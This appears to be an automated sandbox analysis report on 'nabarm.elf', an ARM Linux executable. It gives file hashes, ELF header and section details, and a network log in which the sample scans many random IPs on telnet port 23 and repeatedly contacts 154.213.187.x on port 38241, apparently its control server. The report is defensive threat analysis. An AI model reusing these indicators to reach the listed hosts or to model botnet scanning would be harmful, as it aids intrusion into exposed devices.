            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
            Entropy (8bit):6.056912222582122
            TrID:
            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
            File name:nabarm.elf
            File size:40'040 bytes
            MD5:d3732e7cd3d368f2be29887954b2f4bc
            SHA1:dafece6c3225fd0ed2e2efaf4cf16040e285b60c
            SHA256:c18308152e39a609a20e4f82a2455fcb42107964ea957f511aafdb2f9751f167
            SHA512:be78a98e5d9b27710f7110961ef5a853b097127aee2b01909dc568536a1f826a2948803eab903f60e5045112fca4d71cd5c76ad6c6ad0f0ad18cc38678402f8a
            SSDEEP:768:vsL+R8aGBoLgcb0kTDPwnub6QNKm33iufzZd8JWGE4T3bsR:0qK5tnuMmCUcJy4T3bsR
            TLSH:5003D786F892CA56C5D591B7FB4E82DC371613A8D1EE7303DE15AB683A4782B0E3B140
            File Content Preview:.ELF...a..........(.........4...........4. ...(.....................................................p...............Q.td..................................-...L."...B"..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

            ELF header

            Class:ELF32
            Data:2's complement, little endian
            Version:1 (current)
            Machine:ARM
            Version Number:0x1
            Type:EXEC (Executable file)
            OS/ABI:ARM - ABI
            ABI Version:0
            Entry Point Address:0x8190
            Flags:0x202
            ELF Header Size:52
            Program Header Offset:52
            Program Header Size:32
            Number of Program Headers:3
            Section Header Offset:39600
            Section Header Size:40
            Number of Section Headers:11
            Header String Table Index:10
            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
            NULL0x00x00x00x00x0000
            .initPROGBITS0x80940x940x180x00x6AX004
            .textPROGBITS0x80b00xb00x89400x00x6AX0016
            .finiPROGBITS0x109f00x89f00x140x00x6AX004
            .rodataPROGBITS0x10a040x8a040xef40x00x2A004
            .ctorsPROGBITS0x198fc0x98fc0x80x00x3WA004
            .dtorsPROGBITS0x199040x99040x80x00x3WA004
            .jcrPROGBITS0x1990c0x990c0x40x00x3WA004
            .dataPROGBITS0x199100x99100x15c0x00x3WA004
            .bssNOBITS0x19a6c0x9a6c0x11980x00x3WA004
            .shstrtabSTRTAB0x00x9a6c0x430x00x0001
            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
            LOAD0x00x80000x80000x98f80x98f86.11060x5R E0x8000.init .text .fini .rodata
            LOAD0x98fc0x198fc0x198fc0x1700x13080.67880x6RW 0x8000.ctors .dtors .jcr .data .bss
            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
            TimestampSource PortDest PortSource IPDest IP
            Nov 28, 2024 09:07:48.015002012 CET4492223192.168.2.13200.110.99.116
            Nov 28, 2024 09:07:48.021301985 CET4686623192.168.2.13112.57.194.21
            Nov 28, 2024 09:07:48.026456118 CET5913623192.168.2.1311.253.232.223
            Nov 28, 2024 09:07:48.034486055 CET4262623192.168.2.13119.182.35.142
            Nov 28, 2024 09:07:48.039844990 CET5421623192.168.2.13130.9.215.70
            Nov 28, 2024 09:07:48.044751883 CET4180223192.168.2.1315.186.224.29
            Nov 28, 2024 09:07:48.049770117 CET3636823192.168.2.13153.92.158.9
            Nov 28, 2024 09:07:48.054785013 CET3844423192.168.2.13208.182.239.143
            Nov 28, 2024 09:07:48.059847116 CET4383223192.168.2.1370.117.64.216
            Nov 28, 2024 09:07:48.064529896 CET5453823192.168.2.1377.125.112.89
            Nov 28, 2024 09:07:48.069581985 CET5249023192.168.2.1358.46.70.252
            Nov 28, 2024 09:07:48.074723005 CET3744223192.168.2.13200.30.100.222
            Nov 28, 2024 09:07:48.079180956 CET3889823192.168.2.13121.147.7.23
            Nov 28, 2024 09:07:48.084896088 CET5523023192.168.2.13213.66.132.187
            Nov 28, 2024 09:07:48.087699890 CET4439823192.168.2.13100.193.107.183
            Nov 28, 2024 09:07:48.090085983 CET5338023192.168.2.1353.103.154.248
            Nov 28, 2024 09:07:48.092233896 CET6064023192.168.2.1347.23.149.177
            Nov 28, 2024 09:07:48.094424963 CET4066623192.168.2.13188.163.160.44
            Nov 28, 2024 09:07:48.096785069 CET4812823192.168.2.1359.159.3.240
            Nov 28, 2024 09:07:48.099122047 CET5769223192.168.2.137.120.113.192
            Nov 28, 2024 09:07:48.134967089 CET2344922200.110.99.116192.168.2.13
            Nov 28, 2024 09:07:48.135032892 CET4492223192.168.2.13200.110.99.116
            Nov 28, 2024 09:07:48.141330004 CET2346866112.57.194.21192.168.2.13
            Nov 28, 2024 09:07:48.141424894 CET4686623192.168.2.13112.57.194.21
            Nov 28, 2024 09:07:48.146425962 CET235913611.253.232.223192.168.2.13
            Nov 28, 2024 09:07:48.146497011 CET5913623192.168.2.1311.253.232.223
            Nov 28, 2024 09:07:48.154409885 CET2342626119.182.35.142192.168.2.13
            Nov 28, 2024 09:07:48.154473066 CET4262623192.168.2.13119.182.35.142
            Nov 28, 2024 09:07:48.160027027 CET2354216130.9.215.70192.168.2.13
            Nov 28, 2024 09:07:48.160095930 CET5421623192.168.2.13130.9.215.70
            Nov 28, 2024 09:07:48.164700985 CET234180215.186.224.29192.168.2.13
            Nov 28, 2024 09:07:48.164822102 CET4180223192.168.2.1315.186.224.29
            Nov 28, 2024 09:07:48.171488047 CET2336368153.92.158.9192.168.2.13
            Nov 28, 2024 09:07:48.171583891 CET3636823192.168.2.13153.92.158.9
            Nov 28, 2024 09:07:48.175919056 CET2338444208.182.239.143192.168.2.13
            Nov 28, 2024 09:07:48.175988913 CET3844423192.168.2.13208.182.239.143
            Nov 28, 2024 09:07:48.183417082 CET234383270.117.64.216192.168.2.13
            Nov 28, 2024 09:07:48.183458090 CET4383223192.168.2.1370.117.64.216
            Nov 28, 2024 09:07:48.184420109 CET235453877.125.112.89192.168.2.13
            Nov 28, 2024 09:07:48.184526920 CET5453823192.168.2.1377.125.112.89
            Nov 28, 2024 09:07:48.192430019 CET235249058.46.70.252192.168.2.13
            Nov 28, 2024 09:07:48.192496061 CET5249023192.168.2.1358.46.70.252
            Nov 28, 2024 09:07:48.195816040 CET2337442200.30.100.222192.168.2.13
            Nov 28, 2024 09:07:48.195951939 CET3744223192.168.2.13200.30.100.222
            Nov 28, 2024 09:07:48.200285912 CET2338898121.147.7.23192.168.2.13
            Nov 28, 2024 09:07:48.200407982 CET3889823192.168.2.13121.147.7.23
            Nov 28, 2024 09:07:48.205872059 CET2355230213.66.132.187192.168.2.13
            Nov 28, 2024 09:07:48.205924988 CET5523023192.168.2.13213.66.132.187
            Nov 28, 2024 09:07:48.207653999 CET2344398100.193.107.183192.168.2.13
            Nov 28, 2024 09:07:48.207745075 CET4439823192.168.2.13100.193.107.183
            Nov 28, 2024 09:07:48.210072994 CET235338053.103.154.248192.168.2.13
            Nov 28, 2024 09:07:48.210122108 CET5338023192.168.2.1353.103.154.248
            Nov 28, 2024 09:07:48.212238073 CET236064047.23.149.177192.168.2.13
            Nov 28, 2024 09:07:48.212349892 CET6064023192.168.2.1347.23.149.177
            Nov 28, 2024 09:07:48.214396000 CET2340666188.163.160.44192.168.2.13
            Nov 28, 2024 09:07:48.214454889 CET4066623192.168.2.13188.163.160.44
            Nov 28, 2024 09:07:48.217107058 CET234812859.159.3.240192.168.2.13
            Nov 28, 2024 09:07:48.217152119 CET4812823192.168.2.1359.159.3.240
            Nov 28, 2024 09:07:48.219182968 CET23576927.120.113.192192.168.2.13
            Nov 28, 2024 09:07:48.219233036 CET5769223192.168.2.137.120.113.192
            Nov 28, 2024 09:07:48.332139015 CET4275638241192.168.2.13154.213.187.214
            Nov 28, 2024 09:07:48.452091932 CET3824142756154.213.187.214192.168.2.13
            Nov 28, 2024 09:07:48.452404022 CET4275638241192.168.2.13154.213.187.214
            Nov 28, 2024 09:07:48.456526995 CET4275638241192.168.2.13154.213.187.214
            Nov 28, 2024 09:07:48.576488018 CET3824142756154.213.187.214192.168.2.13
            Nov 28, 2024 09:07:48.580406904 CET4275638241192.168.2.13154.213.187.214
            Nov 28, 2024 09:07:48.700442076 CET3824142756154.213.187.214192.168.2.13
            Nov 28, 2024 09:07:58.466929913 CET4275638241192.168.2.13154.213.187.214
            Nov 28, 2024 09:07:58.587143898 CET3824142756154.213.187.214192.168.2.13
            Nov 28, 2024 09:07:58.861150980 CET3824142756154.213.187.214192.168.2.13
            Nov 28, 2024 09:07:58.861347914 CET4275638241192.168.2.13154.213.187.214
            Nov 28, 2024 09:07:58.981297970 CET3824142756154.213.187.214192.168.2.13
            Nov 28, 2024 09:07:59.124223948 CET4492223192.168.2.13200.110.99.116
            Nov 28, 2024 09:07:59.124321938 CET4686623192.168.2.13112.57.194.21
            Nov 28, 2024 09:07:59.124326944 CET5913623192.168.2.1311.253.232.223
            Nov 28, 2024 09:07:59.124336004 CET4262623192.168.2.13119.182.35.142
            Nov 28, 2024 09:07:59.124351978 CET5421623192.168.2.13130.9.215.70
            Nov 28, 2024 09:07:59.124361038 CET4180223192.168.2.1315.186.224.29
            Nov 28, 2024 09:07:59.124368906 CET3844423192.168.2.13208.182.239.143
            Nov 28, 2024 09:07:59.124382019 CET4383223192.168.2.1370.117.64.216
            Nov 28, 2024 09:07:59.124382019 CET5453823192.168.2.1377.125.112.89
            Nov 28, 2024 09:07:59.124388933 CET3636823192.168.2.13153.92.158.9
            Nov 28, 2024 09:07:59.124397993 CET3744223192.168.2.13200.30.100.222
            Nov 28, 2024 09:07:59.124399900 CET5249023192.168.2.1358.46.70.252
            Nov 28, 2024 09:07:59.124406099 CET3889823192.168.2.13121.147.7.23
            Nov 28, 2024 09:07:59.124420881 CET5523023192.168.2.13213.66.132.187
            Nov 28, 2024 09:07:59.124423981 CET4439823192.168.2.13100.193.107.183
            Nov 28, 2024 09:07:59.124430895 CET5338023192.168.2.1353.103.154.248
            Nov 28, 2024 09:07:59.124450922 CET6064023192.168.2.1347.23.149.177
            Nov 28, 2024 09:07:59.124458075 CET4066623192.168.2.13188.163.160.44
            Nov 28, 2024 09:07:59.124470949 CET4812823192.168.2.1359.159.3.240
            Nov 28, 2024 09:07:59.124478102 CET5769223192.168.2.137.120.113.192
            Nov 28, 2024 09:07:59.244426966 CET2344922200.110.99.116192.168.2.13
            Nov 28, 2024 09:07:59.244483948 CET4492223192.168.2.13200.110.99.116
            Nov 28, 2024 09:07:59.244688034 CET2346866112.57.194.21192.168.2.13
            Nov 28, 2024 09:07:59.244709969 CET2342626119.182.35.142192.168.2.13
            Nov 28, 2024 09:07:59.244723082 CET235913611.253.232.223192.168.2.13
            Nov 28, 2024 09:07:59.244735003 CET2338444208.182.239.143192.168.2.13
            Nov 28, 2024 09:07:59.244739056 CET4686623192.168.2.13112.57.194.21
            Nov 28, 2024 09:07:59.244751930 CET4262623192.168.2.13119.182.35.142
            Nov 28, 2024 09:07:59.244765043 CET2354216130.9.215.70192.168.2.13
            Nov 28, 2024 09:07:59.244766951 CET5913623192.168.2.1311.253.232.223
            Nov 28, 2024 09:07:59.244776011 CET3844423192.168.2.13208.182.239.143
            Nov 28, 2024 09:07:59.244777918 CET234383270.117.64.216192.168.2.13
            Nov 28, 2024 09:07:59.244791031 CET235453877.125.112.89192.168.2.13
            Nov 28, 2024 09:07:59.244806051 CET5421623192.168.2.13130.9.215.70
            Nov 28, 2024 09:07:59.244812965 CET4383223192.168.2.1370.117.64.216
            Nov 28, 2024 09:07:59.244821072 CET5453823192.168.2.1377.125.112.89
            Nov 28, 2024 09:07:59.244868040 CET234180215.186.224.29192.168.2.13
            Nov 28, 2024 09:07:59.244900942 CET4180223192.168.2.1315.186.224.29
            Nov 28, 2024 09:07:59.245362043 CET2336368153.92.158.9192.168.2.13
            Nov 28, 2024 09:07:59.245383978 CET2337442200.30.100.222192.168.2.13
            Nov 28, 2024 09:07:59.245394945 CET3636823192.168.2.13153.92.158.9
            Nov 28, 2024 09:07:59.245404005 CET2338898121.147.7.23192.168.2.13
            Nov 28, 2024 09:07:59.245439053 CET3744223192.168.2.13200.30.100.222
            Nov 28, 2024 09:07:59.245443106 CET235249058.46.70.252192.168.2.13
            Nov 28, 2024 09:07:59.245465994 CET3889823192.168.2.13121.147.7.23
            Nov 28, 2024 09:07:59.245476007 CET5249023192.168.2.1358.46.70.252
            Nov 28, 2024 09:07:59.245490074 CET2344398100.193.107.183192.168.2.13
            Nov 28, 2024 09:07:59.245507956 CET235338053.103.154.248192.168.2.13
            Nov 28, 2024 09:07:59.245524883 CET4439823192.168.2.13100.193.107.183
            Nov 28, 2024 09:07:59.245527983 CET2355230213.66.132.187192.168.2.13
            Nov 28, 2024 09:07:59.245539904 CET5338023192.168.2.1353.103.154.248
            Nov 28, 2024 09:07:59.245542049 CET236064047.23.149.177192.168.2.13
            Nov 28, 2024 09:07:59.245558023 CET5523023192.168.2.13213.66.132.187
            Nov 28, 2024 09:07:59.245585918 CET6064023192.168.2.1347.23.149.177
            Nov 28, 2024 09:07:59.245604038 CET2340666188.163.160.44192.168.2.13
            Nov 28, 2024 09:07:59.245615005 CET234812859.159.3.240192.168.2.13
            Nov 28, 2024 09:07:59.245626926 CET23576927.120.113.192192.168.2.13
            Nov 28, 2024 09:07:59.245637894 CET4066623192.168.2.13188.163.160.44
            Nov 28, 2024 09:07:59.245645046 CET4812823192.168.2.1359.159.3.240
            Nov 28, 2024 09:07:59.245660067 CET5769223192.168.2.137.120.113.192
            Nov 28, 2024 09:08:00.109268904 CET3786638241192.168.2.13154.213.187.248
            Nov 28, 2024 09:08:00.229856014 CET3824137866154.213.187.248192.168.2.13
            Nov 28, 2024 09:08:00.229984999 CET3786638241192.168.2.13154.213.187.248
            Nov 28, 2024 09:08:00.231467009 CET3786638241192.168.2.13154.213.187.248
            Nov 28, 2024 09:08:00.351432085 CET3824137866154.213.187.248192.168.2.13
            Nov 28, 2024 09:08:00.351660967 CET3786638241192.168.2.13154.213.187.248
            Nov 28, 2024 09:08:00.471739054 CET3824137866154.213.187.248192.168.2.13
            Nov 28, 2024 09:08:01.129148960 CET4770623192.168.2.1357.2.220.238
            Nov 28, 2024 09:08:01.129952908 CET4601623192.168.2.13109.195.47.190
            Nov 28, 2024 09:08:01.130809069 CET5610023192.168.2.13121.204.182.153
            Nov 28, 2024 09:08:01.131599903 CET3521023192.168.2.13191.78.89.159
            Nov 28, 2024 09:08:01.132409096 CET4985423192.168.2.13141.21.219.184
            Nov 28, 2024 09:08:01.133181095 CET5219623192.168.2.13157.40.214.29
            Nov 28, 2024 09:08:01.133963108 CET4465223192.168.2.13173.14.85.113
            Nov 28, 2024 09:08:01.134740114 CET5434623192.168.2.13146.15.214.206
            Nov 28, 2024 09:08:01.135482073 CET4659023192.168.2.138.134.2.120
            Nov 28, 2024 09:08:01.136362076 CET3572223192.168.2.13155.5.36.241
            Nov 28, 2024 09:08:01.137168884 CET3621223192.168.2.13148.163.47.37
            Nov 28, 2024 09:08:01.137974977 CET5751423192.168.2.1344.229.33.181
            Nov 28, 2024 09:08:01.138763905 CET5748823192.168.2.13197.47.175.114
            Nov 28, 2024 09:08:01.139550924 CET5445423192.168.2.13204.63.49.239
            Nov 28, 2024 09:08:01.140402079 CET4919423192.168.2.13162.131.83.150
            Nov 28, 2024 09:08:01.141190052 CET3529823192.168.2.1322.178.71.25
            Nov 28, 2024 09:08:01.141997099 CET3897423192.168.2.13155.200.64.246
            Nov 28, 2024 09:08:01.142821074 CET3592423192.168.2.1380.85.229.241
            Nov 28, 2024 09:08:01.143675089 CET3565223192.168.2.1375.133.191.234
            Nov 28, 2024 09:08:01.144629955 CET3567623192.168.2.13122.5.21.28
            Nov 28, 2024 09:08:01.249125004 CET234770657.2.220.238192.168.2.13
            Nov 28, 2024 09:08:01.249291897 CET4770623192.168.2.1357.2.220.238
            Nov 28, 2024 09:08:01.249840021 CET2346016109.195.47.190192.168.2.13
            Nov 28, 2024 09:08:01.249898911 CET4601623192.168.2.13109.195.47.190
            Nov 28, 2024 09:08:01.250734091 CET2356100121.204.182.153192.168.2.13
            Nov 28, 2024 09:08:01.250802040 CET5610023192.168.2.13121.204.182.153
            Nov 28, 2024 09:08:01.251671076 CET2335210191.78.89.159192.168.2.13
            Nov 28, 2024 09:08:01.251730919 CET3521023192.168.2.13191.78.89.159
            Nov 28, 2024 09:08:01.252291918 CET2349854141.21.219.184192.168.2.13
            Nov 28, 2024 09:08:01.252351046 CET4985423192.168.2.13141.21.219.184
            Nov 28, 2024 09:08:01.253103018 CET2352196157.40.214.29192.168.2.13
            Nov 28, 2024 09:08:01.253177881 CET5219623192.168.2.13157.40.214.29
            Nov 28, 2024 09:08:01.253838062 CET2344652173.14.85.113192.168.2.13
            Nov 28, 2024 09:08:01.253882885 CET4465223192.168.2.13173.14.85.113
            Nov 28, 2024 09:08:01.254622936 CET2354346146.15.214.206192.168.2.13
            Nov 28, 2024 09:08:01.254666090 CET5434623192.168.2.13146.15.214.206
            Nov 28, 2024 09:08:01.255384922 CET23465908.134.2.120192.168.2.13
            Nov 28, 2024 09:08:01.255435944 CET4659023192.168.2.138.134.2.120
            Nov 28, 2024 09:08:01.256228924 CET2335722155.5.36.241192.168.2.13
            Nov 28, 2024 09:08:01.256282091 CET3572223192.168.2.13155.5.36.241
            Nov 28, 2024 09:08:01.257075071 CET2336212148.163.47.37192.168.2.13
            Nov 28, 2024 09:08:01.257129908 CET3621223192.168.2.13148.163.47.37
            Nov 28, 2024 09:08:01.257863998 CET235751444.229.33.181192.168.2.13
            Nov 28, 2024 09:08:01.257910013 CET5751423192.168.2.1344.229.33.181
            Nov 28, 2024 09:08:01.259279013 CET2357488197.47.175.114192.168.2.13
            Nov 28, 2024 09:08:01.259337902 CET5748823192.168.2.13197.47.175.114
            Nov 28, 2024 09:08:01.260590076 CET2354454204.63.49.239192.168.2.13
            Nov 28, 2024 09:08:01.260660887 CET5445423192.168.2.13204.63.49.239
            Nov 28, 2024 09:08:01.261461020 CET2349194162.131.83.150192.168.2.13
            Nov 28, 2024 09:08:01.261507034 CET4919423192.168.2.13162.131.83.150
            Nov 28, 2024 09:08:01.262557983 CET233529822.178.71.25192.168.2.13
            Nov 28, 2024 09:08:01.262608051 CET3529823192.168.2.1322.178.71.25
            Nov 28, 2024 09:08:01.263771057 CET2338974155.200.64.246192.168.2.13
            Nov 28, 2024 09:08:01.263819933 CET3897423192.168.2.13155.200.64.246
            Nov 28, 2024 09:08:01.264800072 CET233592480.85.229.241192.168.2.13
            Nov 28, 2024 09:08:01.264846087 CET3592423192.168.2.1380.85.229.241
            Nov 28, 2024 09:08:01.265722036 CET233565275.133.191.234192.168.2.13
            Nov 28, 2024 09:08:01.265778065 CET3565223192.168.2.1375.133.191.234
            Nov 28, 2024 09:08:01.266829967 CET2335676122.5.21.28192.168.2.13
            Nov 28, 2024 09:08:01.266906023 CET3567623192.168.2.13122.5.21.28
            Nov 28, 2024 09:08:11.348985910 CET3824137866154.213.187.248192.168.2.13
            Nov 28, 2024 09:08:11.349345922 CET3786638241192.168.2.13154.213.187.248
            Nov 28, 2024 09:08:11.469451904 CET3824137866154.213.187.248192.168.2.13
            Nov 28, 2024 09:08:12.157978058 CET4770623192.168.2.1357.2.220.238
            Nov 28, 2024 09:08:12.157978058 CET4601623192.168.2.13109.195.47.190
            Nov 28, 2024 09:08:12.157998085 CET5610023192.168.2.13121.204.182.153
            Nov 28, 2024 09:08:12.158006907 CET3521023192.168.2.13191.78.89.159
            Nov 28, 2024 09:08:12.158025026 CET4985423192.168.2.13141.21.219.184
            Nov 28, 2024 09:08:12.158025026 CET4465223192.168.2.13173.14.85.113
            Nov 28, 2024 09:08:12.158041954 CET5219623192.168.2.13157.40.214.29
            Nov 28, 2024 09:08:12.158051968 CET5434623192.168.2.13146.15.214.206
            Nov 28, 2024 09:08:12.158054113 CET4659023192.168.2.138.134.2.120
            Nov 28, 2024 09:08:12.158087969 CET5751423192.168.2.1344.229.33.181
            Nov 28, 2024 09:08:12.158086061 CET3621223192.168.2.13148.163.47.37
            Nov 28, 2024 09:08:12.158130884 CET3572223192.168.2.13155.5.36.241
            Nov 28, 2024 09:08:12.158130884 CET5748823192.168.2.13197.47.175.114
            Nov 28, 2024 09:08:12.158149958 CET4919423192.168.2.13162.131.83.150
            Nov 28, 2024 09:08:12.158174038 CET3529823192.168.2.1322.178.71.25
            Nov 28, 2024 09:08:12.158195972 CET5445423192.168.2.13204.63.49.239
            Nov 28, 2024 09:08:12.158200026 CET3897423192.168.2.13155.200.64.246
            Nov 28, 2024 09:08:12.158207893 CET3592423192.168.2.1380.85.229.241
            Nov 28, 2024 09:08:12.158236980 CET3567623192.168.2.13122.5.21.28
            Nov 28, 2024 09:08:12.158241034 CET3565223192.168.2.1375.133.191.234
            Nov 28, 2024 09:08:12.278325081 CET234770657.2.220.238192.168.2.13
            Nov 28, 2024 09:08:12.278394938 CET2346016109.195.47.190192.168.2.13
            Nov 28, 2024 09:08:12.278412104 CET4770623192.168.2.1357.2.220.238
            Nov 28, 2024 09:08:12.278458118 CET4601623192.168.2.13109.195.47.190
            Nov 28, 2024 09:08:12.278976917 CET2356100121.204.182.153192.168.2.13
            Nov 28, 2024 09:08:12.279005051 CET2335210191.78.89.159192.168.2.13
            Nov 28, 2024 09:08:12.279048920 CET3521023192.168.2.13191.78.89.159
            Nov 28, 2024 09:08:12.279066086 CET5610023192.168.2.13121.204.182.153
            Nov 28, 2024 09:08:12.279114008 CET2349854141.21.219.184192.168.2.13
            Nov 28, 2024 09:08:12.279125929 CET2344652173.14.85.113192.168.2.13
            Nov 28, 2024 09:08:12.279149055 CET4985423192.168.2.13141.21.219.184
            Nov 28, 2024 09:08:12.279176950 CET4465223192.168.2.13173.14.85.113
            Nov 28, 2024 09:08:12.279190063 CET2352196157.40.214.29192.168.2.13
            Nov 28, 2024 09:08:12.279223919 CET5219623192.168.2.13157.40.214.29
            Nov 28, 2024 09:08:12.279349089 CET2354346146.15.214.206192.168.2.13
            Nov 28, 2024 09:08:12.279360056 CET23465908.134.2.120192.168.2.13
            Nov 28, 2024 09:08:12.279370070 CET235751444.229.33.181192.168.2.13
            Nov 28, 2024 09:08:12.279393911 CET5434623192.168.2.13146.15.214.206
            Nov 28, 2024 09:08:12.279414892 CET4659023192.168.2.138.134.2.120
            Nov 28, 2024 09:08:12.279443026 CET5751423192.168.2.1344.229.33.181
            Nov 28, 2024 09:08:12.279475927 CET2336212148.163.47.37192.168.2.13
            Nov 28, 2024 09:08:12.279486895 CET2335722155.5.36.241192.168.2.13
            Nov 28, 2024 09:08:12.279515982 CET3621223192.168.2.13148.163.47.37
            Nov 28, 2024 09:08:12.279525042 CET3572223192.168.2.13155.5.36.241
            Nov 28, 2024 09:08:12.279548883 CET2357488197.47.175.114192.168.2.13
            Nov 28, 2024 09:08:12.279598951 CET5748823192.168.2.13197.47.175.114
            Nov 28, 2024 09:08:12.279618979 CET2349194162.131.83.150192.168.2.13
            Nov 28, 2024 09:08:12.279629946 CET233529822.178.71.25192.168.2.13
            Nov 28, 2024 09:08:12.279654980 CET4919423192.168.2.13162.131.83.150
            Nov 28, 2024 09:08:12.279669046 CET3529823192.168.2.1322.178.71.25
            Nov 28, 2024 09:08:12.279723883 CET2354454204.63.49.239192.168.2.13
            Nov 28, 2024 09:08:12.279735088 CET233592480.85.229.241192.168.2.13
            Nov 28, 2024 09:08:12.279747009 CET2338974155.200.64.246192.168.2.13
            Nov 28, 2024 09:08:12.279761076 CET5445423192.168.2.13204.63.49.239
            Nov 28, 2024 09:08:12.279776096 CET3592423192.168.2.1380.85.229.241
            Nov 28, 2024 09:08:12.279805899 CET3897423192.168.2.13155.200.64.246
            Nov 28, 2024 09:08:12.279866934 CET2335676122.5.21.28192.168.2.13
            Nov 28, 2024 09:08:12.279879093 CET233565275.133.191.234192.168.2.13
            Nov 28, 2024 09:08:12.279903889 CET3567623192.168.2.13122.5.21.28
            Nov 28, 2024 09:08:12.279926062 CET3565223192.168.2.1375.133.191.234
            Nov 28, 2024 09:08:12.660907984 CET4889638241192.168.2.13154.213.187.245
            Nov 28, 2024 09:08:12.781187057 CET3824148896154.213.187.245192.168.2.13
            Nov 28, 2024 09:08:12.781419992 CET4889638241192.168.2.13154.213.187.245
            Nov 28, 2024 09:08:12.781961918 CET4889638241192.168.2.13154.213.187.245
            Nov 28, 2024 09:08:12.901802063 CET3824148896154.213.187.245192.168.2.13
            Nov 28, 2024 09:08:12.901905060 CET4889638241192.168.2.13154.213.187.245
            Nov 28, 2024 09:08:13.021914005 CET3824148896154.213.187.245192.168.2.13
            Nov 28, 2024 09:08:14.161643028 CET4058223192.168.2.1349.247.192.235
            Nov 28, 2024 09:08:14.162255049 CET5111423192.168.2.13142.69.228.228
            Nov 28, 2024 09:08:14.163005114 CET3423623192.168.2.13188.184.230.200
            Nov 28, 2024 09:08:14.163742065 CET5986823192.168.2.13137.151.227.236
            Nov 28, 2024 09:08:14.164597034 CET3850223192.168.2.1355.243.232.22
            Nov 28, 2024 09:08:14.165438890 CET5880023192.168.2.13183.250.11.128
            Nov 28, 2024 09:08:14.166104078 CET4363423192.168.2.13107.11.195.187
            Nov 28, 2024 09:08:14.166709900 CET5844623192.168.2.1364.77.86.22
            Nov 28, 2024 09:08:14.167300940 CET5868823192.168.2.13129.250.80.88
            Nov 28, 2024 09:08:14.167970896 CET3352623192.168.2.1365.199.158.144
            Nov 28, 2024 09:08:14.168565035 CET3545023192.168.2.13115.93.157.20
            Nov 28, 2024 09:08:14.169161081 CET5142223192.168.2.1357.187.152.175
            Nov 28, 2024 09:08:14.169821024 CET3960423192.168.2.1337.215.18.142
            Nov 28, 2024 09:08:14.170546055 CET3803423192.168.2.13154.118.76.100
            Nov 28, 2024 09:08:14.171191931 CET3784223192.168.2.13188.248.193.174
            Nov 28, 2024 09:08:14.171751976 CET5575823192.168.2.1375.228.158.75
            Nov 28, 2024 09:08:14.172352076 CET3571223192.168.2.1396.239.248.243
            Nov 28, 2024 09:08:14.172996998 CET4655023192.168.2.1391.170.177.60
            Nov 28, 2024 09:08:14.173582077 CET4930823192.168.2.13200.34.63.117
            Nov 28, 2024 09:08:14.174145937 CET4570023192.168.2.1363.24.32.138
